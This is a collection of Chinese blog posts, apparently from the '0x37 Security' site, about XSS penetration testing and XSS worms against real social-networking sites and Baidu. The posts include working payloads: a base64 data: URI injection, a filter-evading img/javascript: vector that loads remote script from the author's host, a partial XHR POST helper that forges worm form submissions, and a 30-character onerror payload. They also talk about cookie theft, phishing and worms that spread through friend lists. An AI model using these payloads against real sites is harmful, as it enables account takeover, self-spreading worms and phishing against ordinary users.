0x37 Security

胡乱弄出了一个这个，方便以后的XSS渗透吧，否则有些代码片段东一堆、西一堆的，不小心找不到了，还会郁闷一阵子。

Encode/Decode模块：这些功能已经可以满足我的需求。稍微复杂点的就没打算集成进来了。

XSSCodz模块：还没对我常用的XSSCodz进行分类，就这样了，顺便把pdp他们的AttackApi.js集成进来。

WormCoreAction模块：现在写蠕虫已经有规律了……

superhei的《Data:_URI_scheme》：http://superhei.blogbus.com/logs/23355141.html。

我拿这个做了下实验：http://hi.baidu.com/xss?jump_url=data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovLzEyNy4wLjAuMS9iYWlkdS5qcz48L3NjcmlwdD4NCg==，我要验证两个问题，一个是这样进来的XSS威力有多大；一个是我这里提到的想法http://www.0x37.com/post/34.html（《XSS Worm: About XHR POST Form Data》）。

XSS Worm的经典动作是：模拟正常表单的提交过程。我觉得我有必要对以前的文章进行一些修正（暂时搁置）。模拟表单的提交过程最常用的还是XHR对象，一般使用POST类型来提交（GET型的很简单，就不用在这提及）。即我要使用下面这个函数：

function _3or7(_m,_s,_a){
_x.open(_m,_s,false);
if(_m=="POST")_x.setRequestHeader("Content-Type","multipart/form-data; boundary=-------------------7964f8dddeb95fc5");
...

<img src=&#04jav&#13;ascr&#09;ipt:i="x=docu&#13;ment.createElement('\u0053\u0043\u0052\u0049\u0050\u0054');x.src='http://www.0x37.com/xxx.js';x.defer=true;doc&#13;ument.getElementsByTagName('HEAD')[0].appendChild(x)";execScri&#13;pt(i)>

好不容易编码绕过它的过滤，远程的JS被加载了，有读的权限，可却没写的权限。真是郁闷……img标签真是够BT的。这个过滤系统也真够BT的。不玩了。停止一阵，做其它事情去……

这几天分析了几个大网站的XSS&CSRF漏洞，又开始思考跨域蠕虫的问题。QZ修饰鬼页后发现了在IE6下跨域的BUG，这个发现带来的冲击可不仅仅是盗cookie那么简单:)，不过我下面要提到的跨域蠕虫与这个BUG无关，本文纯属YY一下。

XSS Worm的流行离不开SNS网络，技术核心非XMLHttpRequest对象莫属，我写了几个SNS网络的Worm，如果这几个Worm之间可以互相通信的话...

今晚刚刚发现。由于危害很大，我不公布具体细节，这两个XSS Trap可以非常轻易爆发蠕虫，因为我以前的校内蠕虫样本还在，所以可以直接修改修改使用。第一个要构造合格的XSS Trap需要点技巧，下面仅是个弹出框，呵呵。

第二个XSS Trap危害最大，编码绕过，可以同时灭掉你的所有好友……

刚才对好看簿进行XSS时，有个照片上传模块是使用flash来完成的。而我没能突破flash上传数据的模拟，只能小小地绕过了一下。在浏览器端，JS控制着整个文档的逻辑。如果我不能知道flash内部逻辑的话，我只知道数据的进出口接口时，这个flash对我来说是一个黑盒，通过XSS我可以控制这两个接口的数据或表达方式。AS与JS通信的缘故。如果我只考虑用JS来实现flash内部数据流的控制（就像我用JS来实现我那些XSS WORM一样，这时的JS在以另一种方式来模拟用户操作，比如直接操作HTTP消息头），这是不太可行的。

那我该怎么办？

好看簿（www.haokanbu.com）XSS Trap就不公开了。我是看到下面这个才奔去，还有其他邮箱（yahoo、hotmail等）：

高级钓鱼的话，不过我钓鱼水平一般……应该让这个XSS Trap抛出个钓鱼页面。或者直接将脚本注入到正常页面中，结合AJAX技术……现在关键的技术点是：如何让XSS Trap自发注入JS到正常页面呢？办法应该还是有的，讨论讨论，现在好些SNS网络喜欢将你email中的其他用户导入邀请。在email身份验证的过程中，有可能就被钓鱼了。

在某SNS网站发一篇文章时，标题的字符数上限为30，如下图：

不过在文章列表中，标题就跨了（如下图，其它状态不跨）。看来这个SNS网络没对输入的字符进行有效过滤，而单单对输出进行过滤。30个字符限制能做什么呢？假如仅为了证明有XSS漏洞，那就简单一句</a><img src= onerror=alert()>。可如果想爆发Worm，那该怎么办？

JS Judo: http://groups.google.com/group/ph4nt0m/browse_thread/thread/107c6cc88c184c95

我就用Chinese Shadow Boxing（太极拳）来形容这样的渗透吧。以静制动，以柔克刚，避实就虚，借力发力，主张一切从客观出发，随人则活，由己则滞。呵呵。这样的技巧是我经常使用的，目标站点有的功能模块要善于运用，这样可以减少很多麻烦，也许还能如JS Judo里说的绕过代码过滤、正则匹配等防御层。这样的攻击手法不常见么？